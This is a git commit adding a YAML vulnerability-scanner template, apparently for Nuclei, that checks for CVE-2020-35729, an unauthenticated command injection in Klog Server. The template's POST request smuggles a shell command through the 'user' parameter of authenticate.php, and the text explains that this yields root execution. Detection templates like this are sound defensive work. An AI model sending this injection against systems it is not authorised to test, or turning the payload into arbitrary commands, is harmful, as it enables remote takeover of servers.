🔥 Add CVE-2020-35729

2021-02-26 18:40:25 +07:00 · 2021-02-26 18:40:25 +07:00 · 65ca8e7a39
parent 4fb3b338a0
commit 65ca8e7a39
1 changed files with 31 additions and 0 deletions
--- a/cves/2020/CVE-2020-35729.yaml
+++ b/cves/2020/CVE-2020-35729.yaml
@ -0,0 +1,31 @@
+id: CVE-2020-35729
+
+info:
+  name: Klog Server Unauthenticated Command Injection
+  author: dwisiswant0
+  severity: critical
+  reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
+  description: |
+    This template exploits an unauthenticated command injection vulnerability
+    in Klog Server versions 2.4.1 and prior.
+
+    The `authenticate.php` file uses the `user` HTTP POST parameter in a call
+    to the `shell_exec()` PHP function without appropriate input validation,
+    allowing arbitrary command execution as the apache user.
+
+    The sudo configuration permits the apache user to execute any command
+    as root without providing a password, resulting in privileged command
+    execution as root.
+
+    Originated from Metasploit module, copyright (c) space-r7.
+  tags: cve,cve2020,apache,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/actions/authenticate.php"
+    body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei'
+    matchers:
+      - type: word
+        words:
+          - "projectdiscovery.io"